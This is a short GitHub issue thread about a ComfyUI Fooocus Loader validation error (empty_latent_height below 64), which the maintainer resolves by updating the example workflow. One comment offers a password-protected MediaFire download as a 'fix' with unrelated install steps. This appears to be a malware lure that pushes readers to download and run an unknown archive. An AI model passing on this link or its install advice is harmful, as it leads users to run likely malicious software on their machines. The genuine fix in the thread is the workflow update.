### ISSUE TITLE
 Fooocus Loader 2:   - Value 1 smaller than min of 64: empty_latent_height

### ISSUE THREAD

**Issue by JimWang151** [Seedsa/Fooocus_Nodes#39]
The latest version of Comfyui, basic workflow in the example, error, how can it be restored to normal?

**_Below is the error msg:_**

got prompt
Failed to validate prompt for output 4:
* Fooocus Loader 2:
  - Value 1 smaller than min of 64: empty_latent_height
Output will be ignored
invalid prompt: {'type': 'prompt_outputs_failed_validation', 'message': 'Prompt outputs failed validation', 'details': '', 'extra_info': {}}

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Seedsa** [comment]
example workflow has been updated

**Comment by JimWang151** [comment]
> example workflow has been updated

Thanks.
